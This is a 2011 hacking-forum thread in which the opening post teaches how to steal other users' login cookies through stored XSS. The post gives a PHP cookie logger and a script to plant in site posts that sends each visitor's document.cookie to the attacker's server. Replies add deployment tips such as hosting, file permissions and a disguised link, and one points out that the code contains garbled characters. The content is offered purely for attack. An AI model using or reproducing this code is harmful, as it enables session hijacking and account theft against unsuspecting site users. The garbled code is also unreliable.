+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Cookie Stealing (/Thread-Cookie-Stealing)
Pages:
1
2
Cookie Stealing - HeR97 - 04-29-2011
In this tutorial you'll learn how to steal someones login cookie.
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
�
�
� �
fwrite($log, $cookie . \n );
�
�
fclose($log);
?>
After that save is at .php.
Than go to a site where you want to steal login cookies.
Than make a post which should look like this:
<script>
document.location = http://linkofyourphp.php?cookie= + document.cookie;
�
�
</script>
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file.
I hope that works for you.
Comment
RE: Cookie Stealing - Toast - 04-30-2011
I think you might have some missing characters, those question mark thingies look odd.
RE: Cookie Stealing - farhan411 - 05-02-2011
Dear its not a full method...............you missed the important step........................
1.a php hosting web...
2. cookie stealer.php file
3.lof.txt file (chm777)
4.fake reffernce link to your stealer page..( i.e elite.gif)
any way nice try..........
RE: Cookie Stealing - HeR97 - 05-02-2011
(05-02-2011, 01:47 PM)farhan411 Wrote: Dear its not a full method...............you missed the important step........................
1.a php hosting web...
2. cookie stealer.php file
3.lof.txt file (chm777)
4.fake reffernce link to your stealer page..( i.e elite.gif)
any way nice try..........
But everybody knows that he needs to upload it to a hosting site
RE: Cookie Stealing - farhan411 - 05-06-2011
dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...
dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...any way thanks dear
RE: Cookie Stealing - 1llusion - 05-06-2011
(05-06-2011, 08:10 PM)farhan411 Wrote: dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...
dear where is your receiver text file with ch777 mode???dear you just told to make a txt file...any way thanks dear
are you trying to look pro or what? I mean, he told you to make the text file, you can even see it from the actual code itself and chmoding is pure logic... oh and it doesn't have to be 777, 777 actually makes the file unsecure, 222 is better since its just write, or 722 so the owner has all rights
At OP:
Nice guide!!!! I would just add one small thing, just a little info how to find out, if the site is vuln to XSS
RE: Cookie Stealing - niceblue - 05-07-2011
This is Old but still working
RE: Cookie Stealing - hixhax - 05-08-2011
Ahhh the script part at the end always evaded me. This is very nice for future reference.
RE: Cookie Stealing - murder - 05-09-2011
I think, Nothing will work if the site is not vulnerable to XSS .
RE: Cookie Stealing - v1rtuaL.GobliN - 05-09-2011
(04-29-2011, 08:40 PM)HeR97 Wrote: In this tutorial you'll learn how to steal someones login cookie.its working on every site?or its working only on sites which are not protected?
Open notepad.
There type:
<?php
$cookie = $_GET['cookie'];
$log = fopen( log.txt , a );
�
�
� �
fwrite($log, $cookie . \n );
�
�
fclose($log);
?>
After that save is at .php.
Than go to a site where you want to steal login cookies.
Than make a post which should look like this:
<script>
document.location = http://linkofyourphp.php?cookie= + document.cookie;
�
�
</script>
Than who enters there will send you his login cookie for that site.Login cookie will be in .txt file.
I hope that works for you.
Comment